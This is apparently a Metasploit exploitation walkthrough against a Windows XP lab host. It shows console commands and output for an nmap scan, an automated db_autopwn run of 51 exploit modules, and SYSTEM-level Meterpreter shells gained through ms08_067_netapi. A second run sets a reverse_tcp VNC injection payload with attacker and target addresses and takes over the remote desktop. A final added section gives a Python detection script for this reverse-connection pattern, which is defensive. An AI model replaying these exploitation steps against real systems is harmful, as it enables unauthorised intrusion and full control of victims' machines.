msf > db_status
[*] postgresql connected to msf3
msf > hosts
Hosts
=====

address  mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------  ---  ----  -------  ---------  -----  -------  ----  --------
msf > db_nmap 192.168.56.101
[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2011-09-30 07:49 WIT
[*] Nmap: Nmap scan report for 192.168.56.101
[*] Nmap: Host is up (0.0011s latency).
[*] Nmap: Not shown: 996 closed ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: 3389/tcp open ms-term-serv
[*] Nmap: MAC Address: 08:00:27:2B:15:80 (Cadmus Computer Systems)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 1.40 seconds
msf > hosts
Hosts
=====

address         mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------         ---                ----  -------  ---------  -----  -------  ----  --------
192.168.56.101  08:00:27:2B:15:80
msf > db_autopwn -p -t -e
[*] Analysis completed in 8 seconds (0 vulns / 0 refs)
[*]
[*] =========================================================================
[*] Matching Exploit Modules
[*] =========================================================================
[*] 192.168.56.101:135 exploit/windows/dcerpc/ms03_026_dcom (port match)
[*] 192.168.56.101:139 exploit/freebsd/samba/trans2open (port match)
[*] 192.168.56.101:139 exploit/linux/samba/chain_reply (port match)
[*] 192.168.56.101:139 exploit/linux/samba/lsa_transnames_heap (port match)
[*] 192.168.56.101:139 exploit/linux/samba/trans2open (port match)
[*] 192.168.56.101:139 exploit/multi/samba/nttrans (port match)
[*] 192.168.56.101:139 exploit/multi/samba/usermap_script (port match)
[*] 192.168.56.101:139 exploit/netware/smb/lsass_cifs (port match)
[*] 192.168.56.101:139 exploit/osx/samba/lsa_transnames_heap (port match)
[*] 192.168.56.101:139 exploit/solaris/samba/trans2open (port match)
[*] 192.168.56.101:139 exploit/windows/brightstor/ca_arcserve_342 (port match)
[*] 192.168.56.101:139 exploit/windows/brightstor/etrust_itm_alert (port match)
[*] 192.168.56.101:139 exploit/windows/smb/ms03_049_netapi (port match)
[*] 192.168.56.101:139 exploit/windows/smb/ms04_011_lsass (port match)
[*] 192.168.56.101:139 exploit/windows/smb/ms04_031_netdde (port match)
----------------------------------cut here------------------------------------------
(1/51 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.56.101:135...
[*] (2/51 [0 sessions]): Launching exploit/freebsd/samba/trans2open against 192.168.56.101:139...
[*] (3/51 [0 sessions]): Launching exploit/linux/samba/chain_reply against 192.168.56.101:139...
[*] (4/51 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.56.101:139...
[*] (5/51 [0 sessions]): Launching exploit/linux/samba/trans2open against 192.168.56.101:139...
[*] (6/51 [0 sessions]): Launching exploit/multi/samba/nttrans against 192.168.56.101:139...
[*] (7/51 [0 sessions]): Launching exploit/multi/samba/usermap_script against 192.168.56.101:139...
[*] (8/51 [0 sessions]): Launching exploit/netware/smb/lsass_cifs against 192.168.56.101:139...
[*] (9/51 [0 sessions]): Launching exploit/osx/samba/lsa_transnames_heap against 192.168.56.101:139...
[*] (10/51 [0 sessions]): Launching exploit/solaris/samba/trans2open against 192.168.56.101:139...
[*] (11/51 [0 sessions]): Launching exploit/windows/brightstor/ca_arcserve_342 against 192.168.56.101:139...
[*] (12/51 [0 sessions]): Launching exploit/windows/brightstor/etrust_itm_alert against 192.168.56.101:139...
[*] (13/51 [0 sessions]): Launching exploit/windows/smb/ms03_049_netapi against 192.168.56.101:139...
[*] (14/51 [0 sessions]): Launching exploit/windows/smb/ms04_011_lsass against 192.168.56.101:139...
[*] (15/51 [0 sessions]): Launching exploit/windows/smb/ms04_031_netdde against 192.168.56.101:139...
[*] (16/51 [0 sessions]): Launching exploit/windows/smb/ms05_039_pnp against 192.168.56.101:139...
[*] (17/51 [0 sessions]): Launching exploit/windows/smb/ms06_040_netapi against 192.168.56.101:139...
[*] (18/51 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwapi against 192.168.56.101:139...
[*] (19/51 [0 sessions]): Launching exploit/windows/smb/ms06_066_nwwks against 192.168.56.101:139...
[*] (20/51 [0 sessions]): Launching exploit/windows/smb/ms06_070_wkssvc against 192.168.56.101:139...
[*] (21/51 [0 sessions]): Launching exploit/windows/smb/ms07_029_msdns_zonename against 192.168.56.101:139...
[*] (22/51 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.56.101:139...
[*] (23/51 [0 sessions]): Launching exploit/windows/smb/ms10_061_spoolss against 192.168.56.101:139...
[*] (24/51 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.56.101:139...
[*] (25/51 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.56.101:139...
[*] (26/51 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.56.101:139...
----------------------------------cut here------------------------------------------
(49/51 [0 sessions]): Launching exploit/windows/smb/netidentity_xtierrpcpipe against 192.168.56.101:445...
[*] (50/51 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.56.101:445...
[*] (51/51 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.56.101:445...
[*] (51/51 [0 sessions]): Waiting on 38 launched modules to finish execution...
[*] (51/51 [0 sessions]): Waiting on 25 launched modules to finish execution...
[*] Meterpreter session 1 opened (192.168.56.1:49973 -> 192.168.56.101:20907) at 2011-09-30 07:51:35 +0700
[*] (51/51 [1 sessions]): Waiting on 11 launched modules to finish execution...
[*] Meterpreter session 2 opened (192.168.56.1:58149 -> 192.168.56.101:33496) at 2011-09-30 07:51:37 +0700
[*] (51/51 [2 sessions]): Waiting on 7 launched modules to finish execution...
[*] (51/51 [2 sessions]): Waiting on 6 launched modules to finish execution...
Active sessions
===============

  Id  Type                   Information                     Connection                                  Via
  --  ----                   -----------                     ----------                                  ---
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SADAHIKE  192.168.56.1:49973 -> 192.168.56.101:20907  exploit/windows/smb/ms08_067_netapi
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SADAHIKE  192.168.56.1:58149 -> 192.168.56.101:33496  exploit/windows/smb/ms08_067_netapi
[*] =========================================================================
msf > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 1952 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
From here you have a SYSTEM shell on the box.

Or try this instead:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/vncinject/reverse_tcp
PAYLOAD => windows/vncinject/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/vncinject/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   AUTOVNC   true             yes       Automatically launch VNC viewer if present
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port
   VNCHOST   127.0.0.1        yes       The local host to use for the VNC proxy
   VNCPORT   5900             yes       The local port to use for the VNC proxy

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.56.101
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 3 created in the background.
VNC Viewer Free Edition 4.1.1 for X - built Apr 9 2010 15:52:37
Copyright (C) 2002-2005 RealVNC Ltd.
See http://www.realvnc.com for information on VNC.
msf exploit(ms08_067_netapi) >
Fri Sep 30 08:14:30 2011
CConn: connected to host 127.0.0.1 port 5900
Fri Sep 30 08:14:31 2011
CConnection: Server supports RFB protocol version 3.8
CConnection: Using RFB protocol version 3.8
TXImage: Using default colormap and visual, TrueColor, depth 24.
CConn: Using pixel format depth 6 (8bpp) rgb222
CConn: Using ZRLE encoding
CConn: Throughput 3781 kbit/s - changing to hextile encoding
CConn: Throughput 3781 kbit/s - changing to full colour
CConn: Using pixel format depth 24 (32bpp) little-endian rgb888
CConn: Using hextile encoding
Fri Sep 30 08:14:32 2011
CConn: Throughput 20000 kbit/s - changing to raw encoding
CConn: Using raw encoding
now you can control the Windows desktop on your own :p
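What the two sessions above look like from the other side of the wire: a burst of inbound connections to 135/139/445 from one source (db_autopwn launched 51 modules), followed a few seconds later by the target itself opening TCP connections back to that source on high ports (20907 and 33496 for the Meterpreter sessions, 4444 for the VNC reverse_tcp handler). The script below is an added detection example, not part of this writeup or of Metasploit; the flow records and their "timestamp src sport dst dport" format are constructed to mirror the transcript, and the thresholds (five inbound attempts, five-minute window) are assumptions to tune for your own network.

```python
"""Detection sketch: many inbound SMB/RPC connections from one peer, then the
target opens an outbound connection back to that same peer on a high port
(the reverse-payload pattern produced by the exploitation shown above)."""
from collections import defaultdict
from datetime import datetime, timedelta

SMB_RPC_PORTS = {135, 139, 445}

# Constructed flow log (assumed format "timestamp src sport dst dport"),
# shaped like the transcript: exploit attempts from 192.168.56.1 against
# 192.168.56.101:135/139/445, then the victim connecting back to
# 192.168.56.1 on 20907 and 33496. One unrelated peer and one ordinary
# outbound HTTP flow are included as negatives. Not real capture data.
CONSTRUCTED_FLOWS = """\
2011-09-30T07:51:01 192.168.56.1 40001 192.168.56.101 135
2011-09-30T07:51:02 192.168.56.1 40002 192.168.56.101 139
2011-09-30T07:51:03 192.168.56.1 40003 192.168.56.101 139
2011-09-30T07:51:04 192.168.56.1 40004 192.168.56.101 445
2011-09-30T07:51:05 192.168.56.1 40005 192.168.56.101 445
2011-09-30T07:51:06 192.168.56.1 40006 192.168.56.101 445
2011-09-30T07:51:10 192.168.56.102 50001 192.168.56.101 445
2011-09-30T07:51:35 192.168.56.101 1041 192.168.56.1 20907
2011-09-30T07:51:37 192.168.56.101 1042 192.168.56.1 33496
2011-09-30T07:52:00 192.168.56.101 1043 192.168.56.102 80
"""


def parse_flows(text):
    """Parse the constructed flow format into (ts, src, sport, dst, dport) tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, sport, dst, dport = line.split()
        flows.append((datetime.fromisoformat(ts), src, int(sport), dst, int(dport)))
    return flows


def find_reverse_connections(flows, min_inbound=5, window=timedelta(minutes=5), low_port_max=1023):
    """Return one alert per outbound connection to a high port from a host that,
    within `window` before it, received at least `min_inbound` connections on
    SMB/RPC ports from the very peer it is now connecting to."""
    inbound = defaultdict(list)  # (target, source) -> timestamps of SMB/RPC hits
    for ts, src, sport, dst, dport in flows:
        if dport in SMB_RPC_PORTS:
            inbound[(dst, src)].append(ts)

    alerts = []
    for ts, src, sport, dst, dport in flows:
        # Only consider connections to non-well-known ports; the SMB/RPC
        # attempts themselves and ordinary outbound HTTP are not candidates.
        if dport in SMB_RPC_PORTS or dport <= low_port_max:
            continue
        recent = [t for t in inbound.get((src, dst), []) if ts - window <= t <= ts]
        if len(recent) >= min_inbound:
            alerts.append({
                "victim": src,
                "peer": dst,
                "dport": dport,
                "ts": ts.isoformat(),
                "inbound_attempts": len(recent),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_reverse_connections(parse_flows(CONSTRUCTED_FLOWS)):
        print("possible reverse payload: %(victim)s -> %(peer)s:%(dport)d at %(ts)s "
              "after %(inbound_attempts)d SMB/RPC connections from that peer" % alert)
```

The correlation key is the ordered pair (target, source): the alert fires only when the host that was hammered on SMB/RPC turns around and initiates a connection to the same peer, which is what distinguishes this from a port scan with no follow-up. Hosts that legitimately serve SMB to a given peer and also connect back to it will need an allow-list.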